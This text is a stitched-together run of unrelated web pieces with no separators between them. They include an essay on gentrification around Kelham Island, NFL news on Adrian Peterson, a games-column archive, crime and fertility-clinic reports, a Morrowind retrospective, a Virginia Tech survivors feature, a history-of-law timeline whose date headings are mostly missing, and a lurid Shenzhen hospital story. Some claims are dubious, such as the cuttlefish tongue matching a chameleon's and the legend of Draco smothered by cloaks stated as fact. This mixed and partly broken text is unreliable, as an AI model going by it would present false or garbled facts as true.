In fact, historical images show that residential displacement in the area occurred a long time before the recent regeneration of the area. Here is the junction of Neepsend Lane, Harvest Lane, and Rowland Street in the 1930s, and here is the exact same spot in 2016. Every single residential building was cleared for industrial use. Here is the junction between Percy Street and Burton Road in 1965, and here is the same junction today. Again, industrial use. Further to the west end of Neepsend (about 15-20 minutes walk from the centre of Kelham Island) the residential destruction was even more pronounced. Here is Farfield Road from Neepsend train station in 1965. Here it is today. Neepsend train station is long gone, along with an entire residential district.
There are many, many pictures showing similar levels of residential clearance between the 30s and 60s across the entire region surrounding Kelham Island. People may have lived in this region at one time, but until the new generation of residents began moving in 15 years ago (almost) no one had been living there for about 40 years.
Displacement of industry?
One strange thing about the area surrounding Kelham Island is that the main thoroughfares running through the region (Alma Street/Mowbray Street/Neepsend Lane/Shalesmoor/Penistone Road) are absolutely dense with industrial buildings. Residential developments exist in small pockets closer to Kelham Island itself, but the vast majority of the region is industrial. This raises the question: whilst residential displacement is almost certainly not happening, what about industrial displacement? Are smaller, working-class companies being forced out due to middle-class residents moving in? Isn't this also a kind of gentrification?
Well, it's extremely hard to tell. As I pointed out earlier, Kelham Island was mostly derelict and underutilised before all these new developments appeared. Rather than closing down industrial companies, these new developments seem to have been built on derelict spaces. Little Kelham has been built on the old Miba Tyzack works, abandoned in 2007 when Tyzack moved the jobs to Slovakia. The recently completed Kelham Works building next to Kelham Island Tavern has been built over a factory that was abandoned in 2013 at the latest. A massive new development called Dun Works is being built over the remains of factories that were derelict before 2008. The newly complete Cornish Steelworks development has been built over factories that became unused sometime between 2008 and 2012 according to Street View.
And these are only the most recent developments. The initial developments that spurred on regeneration in the area included Cornish Place Works, which was abandoned in 1992 after decades of underutilisation and redeveloped into apartments in 1998, Globe Works, which was abandoned in the 1970s and not redeveloped until the late 1990s, and Brooklyn Works, which was empty from at least the early 1980s until the late 1990s.
What's clear is that there has been a pattern of massive industrial decline across the entirety of Kelham Island over the past few decades (well, across the country in general) which led to many of its buildings being abandoned. Modern developments have simply appeared in their place, replacing dereliction for residential use. Will the increase in trendy apartments begin to push out already existing industrial enterprises, or will they voluntarily relocate? It's hard to tell at this point.
The illusion of gentrification
We're presented with a situation where the sudden appearance of hipsters and trendy bars in an area which used to be industrial and derelict makes people simply assume gentrification has occurred. They then direct their anger at the new residents of the area who seem to fit the “gentrifying foot soldiers” stereotype. In reality, this appearance of gentrification is almost certainly an illusion.
There's a lesson here. It's all too human to want to simplify things and make quick judgements based on simple visual cues, particularly if these visual cues signify people who might inadvertently force you out of your neighbourhood and effectively ruin your community and the life you have built. Unfortunately, this has led to the cultural demonisation of a collection of traits (beards, bikes, coffee shops) which are clearly all inherently harmless. Gentrification is a much more complicated and subtle process than guys with beards opening coffee shops in a neighbourhood. We do ourselves and our cities a disservice by lashing out at surface visual and behavioural “cues” for gentrification. We should be stepping back to think more about the slow, subtle cultural shifts in feelings towards city living amongst younger demographics that have been building over the past 20 years. We should also look at what kinds of things are motivating them to move into cheap inner city areas, inadvertently pushing up house prices and unintentionally displacing people already living there. Only then can we hope to come up with genuine solutions to issues of displacement.
This year's Minnesota Vikings are in goal-setting mode.
Pass rusher Jared Allen says Michael Strahan's NFL single-season record of 22.5 sacks is "absolutely reachable," and Adrian Peterson repeatedly has talked about running for 2,500 yards.
Peterson didn't stop there. Fresh off his dominant 2,097-yard campaign, Peterson is thinking long-term: Specifically, Emmitt Smith's NFL record of 18,355 rushing yards.
Peterson is 9,506 yards away, and Dan Wiederer of The Star Tribune (thankfully) has done the math. If Peterson stays on his career pace of 98.4 yards per game, he'll top Smith in Week 4 of 2019.
Peterson says he'll get there sooner.
Camp coverage on NFL Network Watch "Inside Training Camp" this week from 10 a.m. to 7 p.m. ET on NFL Network.
» Complete training camp coverage
"I've been in the league seven years," Peterson told Wiederer. "I'm already right around (9,000). Calculate it out ... Let's think. Maybe get a couple 2,000-yard seasons ... I've got ... Hmmm ... 2017."
Drilling down, Peterson targeted Week 16 of that campaign, which charts out to 120.3 yards per game without a hiccup.
Anyone else, and we'd have our doubts.
The Around The League Podcast is now available on iTunes! Click here to listen and subscribe.
From 2014-2015, RPS's Senior Scottish Correspondent Cara Ellison wrote S.EXE, 29 columns about games sex, games about love, games about the space in between those two things, games about sexuality, and games about schlongs. Unfortunately the series is on indefinite hiatus as Cara takes a break from writing about games after her spectacular but surely exhausting Embed With… project, but whether you missed it the first time, didn't catch all of them or are simply missing it already, you should absolutely revisit S.EXE yourself now. It's a by turns insightful and funny (and very often both) document of the wilder side of games, the darker side of games, the sillier side of games and a hugely important but often little-seen side of games. Here's the complete archive.
Please be aware that many of these are NSFW, depending on your workplace or whoever else is watching.
And, sadly enough, that's it for now. It's not quite the end of S.EXE, however: Cara has plans for the series, including a standalone compliation of everything to date. Many thanks for writing these, Cara. We hope you come back soon.
Chris Fox, CP24.com
Police have arrested a 19-year-old man who allegedly robbed 10 west-end banks over a two-month period.
The robberies took place between January 12 and March 19.
In each incident, police say the man posed as a customer until he reached a teller and then produced a note indicating he was armed and demanding cash.
Police previously said that the suspect seemed to operate in bunches, hitting three banks in a row on January 27 and another four banks on Feb. 13.
“His last robbery prior to the 19th of March was the 19th of February so he's gone in sprees,” Staff Insp. Mike Earl said during a press conference last month.
Gianluca Catalano, 19, was arrested by Hold Up Squad investigators on Friday. Catalano is facing 24 charges, including 10 counts of robbery and 10 counts of disguise with intent.
Cuttlefish have a tongue much like a chameleon's. It can extend up to the entire length of its own body. Aside from the cuttlebone, the beak is the only other solid body-part inside the cuttlefish.
The Broadclub cuttlefish uses its colour-changing ability in a very peculiar fashion. They strobe patterns down their body to mesmerise their prey. The pattern is referred to as ‘passing clouds' because it seems to mimic the shadows of clouds passing overhead.
The strobing effect on its prey appears to dazzle them. Cleverly, cuttlefish seem to only use this on larger prey that may pose a challenge. They contort their tentacles in such a way to allow them to easily circle their prey, which intensifies the 'hypnosis'.
In a blink of an eye, a cuttlefish can strike.
AirServer Desktop Edition transforms your PC into a universal AirPlay + Miracast + Google Cast receiver. Note: The download includes 14-day fully functional free trial. With AirServer running on your PC, you can wirelessly mirror your iOS devices or Macs over AirPlay, cast your Android devices and Chromebooks over Google Cast or project your Android or Windows 10 devices using Miracast. All this without needing to install any 3rd party applications on your source device. AirServer Desktop Edition is completely hardware accelerated and can handle simultaneous mirroring connections from multiple devices at the same time, even on low spec'd hardware. As a result you get stable, buttery smooth mirroring performance with high fidelity audio. In classrooms, AirServer enables BYOD, allowing teachers and students to collaborate using their own devices in front of the entire class. At home, AirServer turns your home theater PC into a media hub allowing you to mirror content from various devices and experience it on a bigger screen or better speakers. For the home-theater enthusiasts, AirServer also enables multi-room AirPlay audio support. If you own a set of AirPlay speakers, and use iTunes on your computer, be sure to try out the multi-room AirPlay audio feature, now available on your PC through AirServer.
The head of a Dutch fertility clinic has been accused of using his own sperm instead of that of chosen donors to father dozens of children.
Twenty-three parents and children of those born through IVF treatment from the Bijdorp medical centre, near Rotterdam, have gone to court to ask for tests on the DNA of Jan Karbaat, who died aged 89 last month.
Karbaat ran one of the country's largest sperm banks in the 1980s and 1990s, billed himself as “a pioneer in the field of fertilisation”.
But reports began to emerge last year that suggested he may have been fathering the children he helped to conceive - in a plot twist that has echoes of Glasgow crime drama Taggart.
Women who used the clinic report being told by Karbaat that he was getting “fresh seed” from a room next to the insemination area, and say they have noticed physical similarities between Karbaat and their children, including eye colour, that don't match with their official donor's characteristics.
Karbaat reportedly admitted to having fathered about 60 children in his time at the clinic, which closed in 2009 amid reports of irregularities, and requested in his will that no DNA tests be carried out on him post-mortem.
In 2002, it would've taken some nerve for a game like Morrowind to show its ash-covered, grubby face on home consoles. All this high-fantasy business was yet to become the norm it is today, and RPGs were still a PC or even tabletop phenomenon. Ask a console gamer back then about RPGs, and they'd probably start singing the praises of the Final Fantasy series. Square Enix's legendary franchise undoubtedly set the pace on consoles, but this was the dawn of a new world of open-world exploration, a template for 'western' RPGs that were once the preserve of PC gamers.
On the other hand, this was a time when The Lord Of The Rings was riding high in the public consciousness, proving that Hobbits and Orcs could survive in the spotlight. So perhaps it was the perfect time for the third entry in the Elder Scrolls series to test console waters.
It was a liberating feeling, stepping out of the Census and Excise office in Seyda Neen for the first time and realising, to the timeless twinkle of Jeremy Soule's score, that you were off the leash to do as you pleased. There was no mod support on the Xbox version, and performance paled next to PCs, but what did console gamers care for such techy twaddle? It was recompensed by the fact that you didn't have to hunch over a small CRT monitor to explore its unique world, and could instead kick back on the couch or in bed in front of a probably much larger (but equally CRT) TV. Morrowind was foremost a game of scale and immersion, making a bigger screen all the better for soaking it all in.
The scale wasn't just vast emptiness either. The land of Vvardenfell was believable – a fully realised chunk of world with towns, marshes, fields populated by farmers supplying food for regional capitals and a whole load of ashen wasteland encircling the formidable Red Mountain at the island's centre. None of Vvardenfell was separated into zones where you'd leave a verdant forest, twiddle your thumbs over a loading screen, then appear in the middle of a desert.
What are the best MMOs to play right now? The best MMORPGs on PC, console and mobile
The land felt geographically tangible to a level not achieved in its successors, as even entering cities was completely seamless (although the initial load, as well as reloading saves, did take aeons). It was a go-anywhere, do-anything experience only matched at that time by Grand Theft Auto (the Bethesda marketing team wisely pounced on the inevitable comparisons, slapping press quotes calling it a ‘fantasy GTA III' on the game box – a good way to lend some kudos to the unfashionable-at-the-time RPG).
How Morrowind pioneered open world RPG exploration on consoles
The charms of Morrowind are encapsulated neatly in the first 20 or so minutes of play. After picking your class, race and star sign at the Census Office, you step outside into the sleepy village of Seyda Neen. To the north, in the distance, you see signs at a fork in the road. This is more than a mere ornamental world- building touch, as you rely on signs – along with directions scribbled into your scrappy journal and the goodwill of passers-by – to navigate the world; without pointers on your compass or waypoints on your map telling you exactly where to go, Morrowind to this day remains a landmark example of unguided video game exploration.
But before heading out into the wild, you could exploit one of the most wonderful systems in the game. Shops in Morrowind were stocked with many of the goods they were selling, and not in some incorporeal way where they were stuck to the shelves, but in the sense that you could actually reach out and nab them. So if you were prepared to live the fugitive lifestyle in exchange for considerable riches and overpowered equipment, then you could walk straight into Arrille's Tradehouse and help yourself.
Looking back, of course, the theft system was broken. Using it, there was a good chance that by level 10 you'd have near-endless sums of money, and equipment that was far beyond the remit of someone as lowly in standing as yourself. If you were plucky enough, you could even sidestep the entire game and go straight up Red Mountain to take on end-boss Dagoth Ur. It may seem ridiculous, but it also indicated a bold openness that few games today would dare to attempt. It says a lot about the pace of evolution in RPG freedom that the (brilliant) The Legend of Zelda: Breath of the Wild recently received huge plaudits for offering the same option, 15 years later. The fact that world-record Morrowind speedruns have taken under four minutes, while Oblivion and Skyrim's take closer to 40 minutes, offers some perspective on how unrestricted it was.
So after robbing the shop blind, you make for the road, guided only by the note in your journal telling you to go to Balmora. Conveniently, one of the two directions on the roadsign is for just that town, so you head through mudcrab-infested marshes, only to hear a comical shriek and see an eccentrically dressed wizard plummet to the ground at your feet, dying on impact. In an odd crossover with Greek mythology, on his person are Scrolls of Icarian Flight, which you of course help yourself to and cast without considering that you'd probably meet the same crunching fate as him (once you'd figured out how to equip items using the cryptic UI, that is).
Want more Elder Scrolls? Explore Tamriel with the best locations in the Elder Scrolls series
You cast the spell, jump, and shoot through the clouds. If you took a running jump, you could cross about half the continent this way – although, Xbox draw distances being what they were, all you'd see during your flight would be white mist and loading bars until you were about 20 feet from the ground. If you were lucky, you'd land in water and could continue your adventure from whatever far-flung puddle you found yourself swimming in. It was a savvy design choice by Bethesda, exhibiting to players that there really were no limits to this special world even as you reloaded your most recent save.
Before Skyrim's Nordic inspiration, Morrowind explored more fantastical worlds
Despite being a high-fantasy setting of sorts, Morrowind was far removed from the more traditional landscapes of Oblivion and Skyrim. Vvardenfell was a weird place, filled with pterodactyl-like fauna, giant mushrooms, and buildings constructed out of giant crab shells – not to mention the capital city of Vivec, a labyrinthine mess with impressive Mesopotamian architectural inspirations.
The narrative and questing systems were ambitious, coming at a time when the videogame RPG rulebook was still in the process of being written. It starts out as a classic Elder Scrolls ‘chosen one' narrative – you're a prisoner who gets a pardon, then embarks on a quest to fulfil your apparent destiny as the Nerevarine – a reincarnation of a god who's been prophesied to save the land from resurgent tyrant Dagoth Ur.
So far, so Scrolls, but it's more nuanced than it first seems. Even though you get touted as ‘The Nerevarine', you're actually just the latest in a line of five or six, with all the previous ones failing in the same quest you're now embarking on. Unlike in Skyrim where you're born with preternatural gifts, in Morrowind you're just next up on the conveyor belt to fulfil a prophecy.
If you fail in your quest, then perhaps you weren't the Nerevarine after all, and it's up to the next pretender to have a pop. If you succeed, then the prophecies are true, and believers' faith is bolstered; it's a story about the fallibility and faulty logic around faith, rather than the typical tale of manifest destiny we see in later Scrolls entries. The multiple-choice option right at the finale of the game, where you can state whether or not you believe you are indeed the Nerevarine, cleverly plays on this ambiguity.
Morrowind has an intriguing faction system underpinning many of your actions. Alongside the usual Fighters, Mages and Thieves guilds, there were the five great Dunmer houses – influential, mafia-like families coexisting in uneasy peace and knocking each other off behind the scenes. You could work for three of these houses, but once you committed to one you were tied to it for the rest of the game – a rare instance of an RPG sacrificing certain questlines in favour of others.
To some extent, this was the case across other guilds, as your faction reputation and mastery of their requisite skills would dictate who you could join and how far you could progress in the guild hierarchy. Killing certain people could also permanently lock you off from certain questlines.
At one fascinating fork, the corrupt Fighters' Guild leader asks you to kill several leaders of the Thieves' Guild, which would obviously severely dent your chances of joining the latter. Unbeknownst to you, however, this quest is actually optional, and at this point, with enough snooping around, you can continue your Fighters' Guild progression through another guildmaster, who will eventually task you with taking out his corrupt peer. This would, however, lock you off from carrying out the same task for the Thieves' Guild later, because your target would already be dead. Broken though they often were, Morrowind had a whole web of underlying systems and intricacies that imbued your actions with a great sense of consequence.
It speaks volumes that the ever-improving Elder Scrolls Online has recently decided to return to Vvardenfell by way of an expansion, nostalgically titled Morrowind. It's also testament to this 15-year-old game's world design that the ESO version uses the same heightmap as the original, retaining the same topography that for so many of us – particularly on consoles – marked our first true open-world experience. As world design goes, Morrowind is a rare game of its era that's proven timeless.
By coming to, and conquering, the Xbox, Morrowind introduced the western RPG to the console scene, revealing that the ostensibly ‘casual' console audience was more hardcore than publishers gave it credit for. With RPGs today ranking among the most popular games on consoles and PCs, perhaps Geralt and co should tip their helms and pointy hats to Morrowind – one of the most ambitious, majestic and kind-of broken RPGs of all time, which taught us that maybe PC and console audiences weren't so very different from each other after all.
This article originally appeared in Xbox: The Official Magazine. For more great Xbox coverage, you can subscribe here.
Kevin Sterne is carried out of Norris Hall at Virginia Tech in Blacksburg, Va., on April 16, 2007. (ALAN KIM/ASSOCIATED PRESS)
Even now, he won't go back inside.
Kevin Sterne hasn't reentered Norris Hall since four police officers rushed his limp body out of the blood-soaked building in the chaos of April 16, 2007 — a horrifying moment captured in a photograph that became a defining image of the Virginia Tech tragedy.
But Sterne, now 27, hasn't run from the school where he nearly died.
Weeks after the massacre and his release from the hospital, where doctors feared they'd have to amputate his leg, he came back to receive his diploma, hobbling across the stage on a crutch. He returned again months later as a graduate student, against his worried mother's wishes, after a brutal stretch of rehabilitation back home.
And he is still here, working as an engineer in a university radar lab — a reluctant symbol of resiliency and recovery and a shattered community's devotion to Virginia Tech.
Monday marks the fifth anniversary of the day a student gunman terrorized the bucolic campus, leaving 32 dead and more than two dozen wounded. For the first time since the deadliest mass shooting by an individual in U.S. history, Virginia Tech will hold classes on the anniversary date. But there will be myriad Day of Remembrance events, as always: candlelight vigils and community picnics, art tributes and private prayer services.
Some of the survivors will convene informally, too, to remember the students and professors killed by Seung Hui Cho — and to reflect, Sterne said, “about how fortunate we are to be alive.” But he added: “That's every day. It's not like it goes away.”
On that freezing morning five years ago, Cho shot two people in a residence hall, returned to his dorm to change his bloody clothes, stopped at the post office to drop his manifesto in the mail, then headed for Norris Hall armed with two handguns and a backpack full of bullets. He chained the building's doors and shot 48 people in 11 minutes before turning a gun on himself.
One bullet cut a hole in Sterne's thigh; another tore through his femoral artery. With his blood gushing onto the floor of his elementary German class, Sterne jammed a finger into his leg, then stuffed a sweatshirt into the wound and tied an electrical cord around his thigh as a tourniquet.
He survived.
He stayed.
The familiarity of the place was comforting, even if he found himself taking detours around the building where he'd been shot. Now he is able to stand outside Norris, talking about the day he nearly died.
“I never had any real curiosity to walk back in,” said Sterne, wringing his hands while his temple twitched.
Time heals only so much.
‘The right place' to heal
By Jay Poole's count, there were 26 students at Norris Hall who suffered injuries that day but survived. Most were shot; a few were injured jumping out of the three-story building's windows.
Six of them graduated from Virginia Tech shortly after the massacre, before Poole was selected to run the Office of Recovery and Support that the university established in the aftermath of April 16.
Then, after the fanfare of the first post-massacre graduation faded, something remarkable happened: The other 20 student survivors quietly came back to Virginia Tech.
“Every single one of them,” Poole said. “And every single one of them graduated.”
They limped back to Blacksburg to continue their studies and to piece their lives back together among friends. They wanted to be in a community that understood.
“It was where I had to be. It was the right place for me to heal,” said Kristina Anderson, who was shot twice in the back and whose gallbladder was removed, as was most of her left kidney.
She was a 19-year-old sophomore at the time of the shooting, and her parents didn't want her to go back to Blacksburg for her last two years. But she never considered leaving. “It would have felt foreign to be anywhere else,” said Anderson, who runs the Koshka Foundation, a nonprofit group dedicated to improving campus safety.
Colin Goddard was shot four times — in his left knee, right shoulder and both hips — in the intermediate French class where 11 people died and six others were injured. His parents figured that he would move to their home in Richmond for a while and transfer elsewhere for his final year.
Instead, he went back to his apartment near Tech after being discharged from the hospital. When classes resumed in the fall, Goddard, too, was back on campus.
“I went back to the community that was trying to heal itself, to show people that, look, there's somebody that's going to be okay,” said Goddard, who works as a lobbyist for the Brady Campaign to Prevent Gun Violence. “I felt that if I didn't return to finish my degree at Virginia Tech, Cho would have taken something else from me.”
Sterne already had enough credits to receive bachelor's degrees in electrical engineering and communications studies, and he was thinking about going to the University of Colorado for his master's degree. But after April 16, he decided he would do his graduate work at Tech.
“I had to return,” said Sterne, who has mutton-chop sideburns that frame his face. “A lot of it was to be with my friends here. They were a part of the recovery process, getting back to a normal life.”
Returning wasn't easy; triggers were everywhere. Going back inside a classroom was difficult. Loud noises — doors slamming, pots clanging — spooked the survivors. Students bursting into class late spooked them. Nobody liked being around Norris Hall.
“Will I be able to do this?” Sterne recalled thinking. “Will I fail out?”
“I freaked out almost every minute for the first month or so,” Goddard said.
At least the survivors had one another.
Loosely bound by tragedy, the injured survivors were brought together by Poole's recovery and support office. There were group therapy sessions and monthly dinners at Poole's house, where the students would talk about their social lives, their grades, their parents, their football team's quarterback controversy — whatever.
Sometimes, they talked about April 16, too. Once, a student showed everybody his scar after a bullet fragment was removed. More often, they compared notes about the things that haunted them.
Not all of the students participated; those who suffered emotional but not physical wounds weren't included on the school's official list of survivors. And some of the injured survivors avoided meeting with the others.
The core group became close, though, finding comfort in shared anxieties. “I couldn't imagine not having them to talk to,” Anderson said.
Eventually, most of the 20 left Blacksburg, taking jobs, starting families, moving on.
Just two remain: Sterne and an elementary German classmate, Derek O'Dell, who is studying veterinary medicine at Tech. But the group's legacy endures, Poole said.
“The strength they displayed in coming back to Virginia Tech in some ways made them unwitting symbols for an entire campus that was struggling to recover from the most horrific event imaginable,” Poole said. “They displayed the most amazing resilience and resolve you can possibly imagine, as students and people.”
Unwanted attention
After his photo was seen worldwide, Sterne became the most famous of the injured students. His survival story was told over and over, even though he ignored all the invitations from reporters and television bookers. He sat in first lady Laura Bush's box at the 2008 State of the Union address. He hated the attention. Still does.
“The survivors are not a boastful group,” he said. “Maybe it's some of what they call survivor's guilt. Why us? Why was somebody else killed and I was spared?”
Sterne, though, said he hasn't felt that guilt, because he knows how close he was to not surviving. And he doesn't ask “Why?” Not about any of it. Too dangerous. “I would drive myself crazy trying to answer a question that has no answer,” he said.
He rarely talks about that day, even with his closest colleagues.
Joseph Baker, a professor who was one of Sterne's faculty advisers before hiring him to help maintain the university's high-frequency radar network, said the subject has barely come up in the four years they've known each other.
“It's not something to be proud of or to talk a lot about,” Sterne said, shrugging. “I just feel like any person that had something unfortunate happen to them.”
Physically, he figures he's recovered about 80 percent. Emotionally? “That's harder to judge,” Sterne said.
His post-traumatic stress disorder recently flared up — triggered by the approaching anniversary, he said. “Sometimes, things get out of control with my emotions and thoughts.”
Sterne's mother, Suzanne Grimes, worries constantly. She hadn't wanted her son to return to Blacksburg in the first place. She would love for him to leave.
“I didn't want him to return because I was concerned about the emotional ramifications,” Grimes said. “I'm still concerned about him being in that environment. It's not that there's anything wrong with the town or the community. But it happened there.”
One recent afternoon, prospective Virginia Tech students, who were in sixth and seventh grade when the shooting occurred, toured the campus. They walked across the Drillfield, and five groups passed the memorial to the April 16 victims. None of the students seemed to notice it.
Sterne stood before the ring of 32 stones engraved with the names of the victims killed, five of whom were in his classroom.
He's gained some distance from that day, he said. He's meeting more and more people who don't know that he survived the shooting. And he's thinking about letting go of Blacksburg.
“There's deep and serious questions about whether I want to stay in a place I almost died,” he said.
He was hurt here, and he healed here, and maybe now it's time to leave here.
Staff research director Madonna Lebling, researcher Jennifer Jenkins, photographer Bill O'Leary and video journalists Pratik Shah and Ben de la Cruz contributed to this report.
As fragments of primitive animals have been kept for us sealed up in the earth's rocks, so fragments of primitive institutions have been preserved, embedded in the rocks of surviving law or custom, mixed up with the rubbish of accumulated tradition, crystallized in the organization of still savage tribes, or kept curiously in the museum of fact and rumor swept together by some ancient historian.1
Some form of law, is always the foundation of even primitive institutions. Law, as it were, has travelled a long, long blood-stained path. From acts so barbaric that they defy belief, to a modern world where much if not most of the world population is exempt from the tyrannical Rule of Man system, and benefit from a transparent Rule of Law. This time-table looks at the significant steps in the ongoing evolution of law on our planet.
► See also the Law's Hall of Fame
► On the Origin of Law
This code has never been discovered but it is mentioned in other documents as a consolidation of existing "ordinances" or laws laid down by Mesopotamian kings. An administrative reform document was discovered which showed that citizens were allowed to know why certain actions were punished. It was also harsh by modern standards. Thieves and adulteresses were to be stoned to death with stones inscribed with the name of their crime. The code confirmed that the "king was appointed by the gods".
The earliest known written legal code of which a copy has been found, albeit a copy in such poor shape that only five articles can be deciphered. Archaeological evidence shows that it was supported by an advanced legal system which included specialized judges, the giving of testimony under oath, the proper form of judicial decisions and the ability of the judges to order that damages be paid to a victim by the guilty party. The Code allowed for the dismissal of corrupt men, protection for the poor and a punishment system where the punishment is proportionate to the crime. Although it is called "Ur-Nammu's Code, historians generally agree that it was written by his son Shugli.
A clay tablet reveals the case, in 1850BC, of the murder of a temple employee by three men. The victim's wife knew of the murder but remained silent. Eventually, the crime came to light and the men and woman were charged with murder. Nine witnesses testified against the men and woman and asked for the death penalty for all four. But the wife had two witnesses which told the court that she had been abused by her husband, that she was not part of the murder and that she was even worse off after her husband's death. The men were executed in front of the victim's house but the woman was spared.
This Greek citizen was chosen to write a code of law for Athens (Greece). The penalty for many offences was death; so severe, that the word "draconian" comes from his name and has come to mean, in the English language, an unreasonably harsh law. His laws were the first written laws of Greece. These laws introduced the state's exclusive role in punishing persons accused of crime, instead of relying on private justice. The citizens adored Draco and upon entering an auditorium one day to attend a reception in his honour, the citizens of Athens showered him with their hats and cloaks as was their customary way to show appreciation. By the time they dug him out from under the clothing, he had been smothered to death.
Socrates was an Athenian philosopher. Socrates was not religious and preached logic. When Athens lost the Peloponesian Wars, conservative Athenians looked for a scapegoat. Three citizens brought an accusation against the 70-year old popular philosopher for allegedly corrupting the youth and for not believing in the gods. He was tried before a jury of 501 citizens that found him guilty on a vote of 281-220. When asked to speak on the proposed sentence, Socrates mocked the jurors and they replied, 361-140, with a sentence of death. Socrates' promoted "conscience" and his death increased interest in his life and teachings.
600: The Laws of Aethelbert (England)
The first laws believed to be written down in England were those of the Saxon (German) invader of Kent, King Aethelbert. The Germans tribes had occupied parts of England since the Romans retreated in about 410. Warren Lehman, in a 1985 paper published in the Journal of Legal History wrote:
"The first laws were probably set down between 600 and 615 in the kingdom of Kent on the southeast tip of England towards the end of the long reign of Aethelbert I. The people for whom Aethelbert and his counsellors wrote what he called domas or dooms - we might say judgments - had been tribesmen not long before. "Law-writing made sense but not necessarily in Roman terms. The borrowed idea of law, I suggest, was radically altered to suit the needs and tastes of the borrowers."
Fingerprinting was in use by this time in China as a means of identifying people.
In 1692, in the town of Salem, Massachusetts, USA, a group of young women accused several other women of practising witchcraft or worship of the Devil. The accusations turned into a judicial frenzy and over 300 people were accused of witchcraft, of which 20 were executed including a priest. The extremity of the penalty turned many against the prosecution of witchcraft. There would be no more witchcraft trials in New England.
The 7 articles of the American Constitution were signed in Philadelphia in 1787 and formed the basis of the first republican government in the world. The Constitution defined the institutions of government and the powers of each institution, carefully carving out the duties of the executive, legislative and judicial branches. The Constitution also declared that it was paramount to any other law, whether federal or state, and it would override any other inconsistent law. The American Constitution served as a model for the constitutions of many nations upon attaining independence or becoming democracies.
Sydney was the site of the first British settlement on Australia, which had been designated as a prime location as a British penal colony. For fifty years, Britain sent its worst men, who were quickly chained into work gangs and put to building roads and bridges. By 1821, there were 30,000 British settlers in the British commonwealth, of which 75% were convicts.
With the ink barely dry on the Constitution (signed only four years earlier), American statesmen amended their supreme law by declaring the rights of free speech, freedom of the press and of religion, a right to trial by one's peers (jury), and protection against "cruel and unusual punishment" or unreasonable searches or seizures. The ten amendments of Bill of Rights became known as the First to Tenth Amendment(s) respectively. The Bill of Rights influenced many modern charters or bills of rights around the world.
In this case (at 5 US 137), the Supreme Court upheld the supremacy of the Constitution and stated unequivocally that it had the power to strike down actions taken by American federal or state legislative bodies which, in its opinion, offended the Constitution.
This has come to be known as the power of "judicial review".
This case is considered by the legal profession to be the most important milestone in the history of American law since the Constitution.
As of August 2007, the case was available from usinfo.state.gov/usa/infousa/facts/democrac/9.htm.
A special panel of eight judges convened in this German town to try Nazi officers for crimes against peace, crimes against humanity and war crimes committed during World War II. The judges came from the USA, Great Britain, France and the Soviet Union. Twenty-four Nazis were tried and twelve received death penalties (although one defendant, Hermann Göring, committed suicide hours before his execution). This trial was important as it showed that even in times of war, basic moral standards apply in spite of military law principles which oblige a subordinate officer to obey orders. "The true test," wrote the Tribunal, "is not the existence of the (superior) order but whether moral choice (in executing it) was in fact possible". The crimes included torture, deportation, persecution and mass extermination.
REFERENCES:
“This is an important approval," says an executive of the telecom giant, which has been working with the U.S. Department of Justice as it reviews the $85.4 billion deal.
The European Commission, the executive body of the European Union, has approved AT&T's proposed $85.4 billion acquisition of Time Warner.
The telecom giant announced the approval, which analysts had expected soon, on Wednesday.
“We appreciate the skilled work of the European Commission's team for their timely effort to analyze and clear the AT&T-Time Warner merger,” said Bob Quinn, senior executive vp AT&T external and legislative affairs.
He added: “This is an important approval from a highly respected authority. The global clearance process is on track, and we look forward to creating a company that will lead the next wave of innovation in the media and telecommunications industries.”
Wall Street has focused its attention on the U.S. regulatory review as international approvals of the deal are widely expected.
AT&T CFO John Stephens told the Deutsche Bank Media & Telecom Conference in Palm Beach, Fla. earlier this month that deal-review processes were going on in Europe, Latin America and Asia. "Those are proceeding as you would expect," he said.
Federal Communications Commission chairman Ajit Pai recently reiterated his expectation that the U.S. regulator would not review the planned transaction. That would mean the regulatory review in the U.S. would be limited to the Justice Department. Analysts have said that it could give the deal a green light with certain conditions.
U.S. President Donald Trump during his election campaign said his administration would not allow the deal, but Wall Street observers and AT&T executives have said that there was no precedent for blocking the transaction outright.
Stephens said about the review process this month: "We continue to work with the DOJ in the normal course, and we continue to move that forward.”
Hospital staff in the city of Shenzhen in southern China's Guangdong Province were in for a shock when they entered a new mother's hospital room only to find her attempting to eat her own baby.
According to The Mirror, medical staff were in shock after they found a new mother attempting to eat her own child just days after delivery. A nurse found the woman, 24-year-old Li Zhenghua, with her jaws clamped firmly around the infant's arm. The nurse called for help and tried to pull the baby free from the cannibal mother. However, the mother refused to let go, and doctors were forced to pry the mother's jaw from the infant's arm with a medical implement. After freeing the child, the medical staff sedated the woman.
News AU notes that the woman, who is believed to be mentally ill, had been discovered heavily pregnant and in labor on the street and brought to the local hospital for delivery. The woman delivered her baby, and medical staff attempted to contact family members. Nursing staff left the woman alone in the room to nurse her baby, and all seemed well. However, three days after delivery, the shocking attack took place. Medical staff later found out that the woman had been tossed from her home after “behaving oddly.” After being kicked from her home by her mother-in-law, the woman remained on the streets for several weeks before she was later found in labor and taken to the hospital.
A hospital spokesman told media that the child's arm was badly damaged and that the staff was able to take the baby to a secure location following the attack.
“It was really shocking; the arm was badly damaged and suffered not only heavy bruising but bleeding as a result of the bite. Fortunately, doctors managed to insert something to stop her closing her teeth and then levered her jaws apart. After that they gave her a sedative and took the baby to a secure location.”
The police are now investigating what caused the woman to attack the baby and trying to determine if the baby should be officially confiscated from both the mother and her husband's family, who seem to no longer want anything to do with woman or possibly a baby.
Do you think the police should even consider sending the baby back with the cannibal mother or the father after he kicked the mentally-ill pregnant woman out into the streets?
Deciding to Live on One Income
A lot of people forget that just a few decades ago, households were run differently. Men were the primary providers and breadwinners while women were the homemakers, cooking, cleaning, and raising children. In today's society, it is more of the norm that families have chosen to have both spouses working, bringing in dual income. This has allowed people to live different lifestyles and afford more luxuries. Although this is now the case with many families, there are some who would like to go back to the previous trend: 1 breadwinner, 1 stay at home parent. Maybe one spouse gets laid off, maybe you decide child care would be best with 1 parent at home, or maybe someone wants to finish their education. Whatever the case may be, there's a transition period. Here are the steps to living on one income when you're used to two:
